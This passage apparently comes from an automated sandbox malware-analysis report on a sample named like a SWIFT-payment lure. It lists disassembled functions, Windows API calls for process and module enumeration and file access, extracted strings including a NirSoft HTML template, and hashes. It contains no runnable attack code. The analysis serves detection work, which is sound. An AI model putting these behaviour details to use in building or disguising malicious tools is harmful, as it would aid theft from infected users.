                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                                      Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 667068680-3953557276
                                                                                                                                                                                                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                                      Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1700100422-0
                                                                                                                                                                                                                                      • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                                      Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                                      Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                                      • String ID: 4$h
                                                                                                                                                                                                                                      • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                                      • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                                      Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                                                                                                      • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                                      Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                                      Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                                      • API String ID: 973020956-4135340389
                                                                                                                                                                                                                                      • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                                      Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                                      • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                                      Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                                      • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                                      Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                                      • API String ID: 1284135714-318151290
                                                                                                                                                                                                                                      • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                                      Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                                      • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                                      Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 290601579-0
                                                                                                                                                                                                                                      • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                                      Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
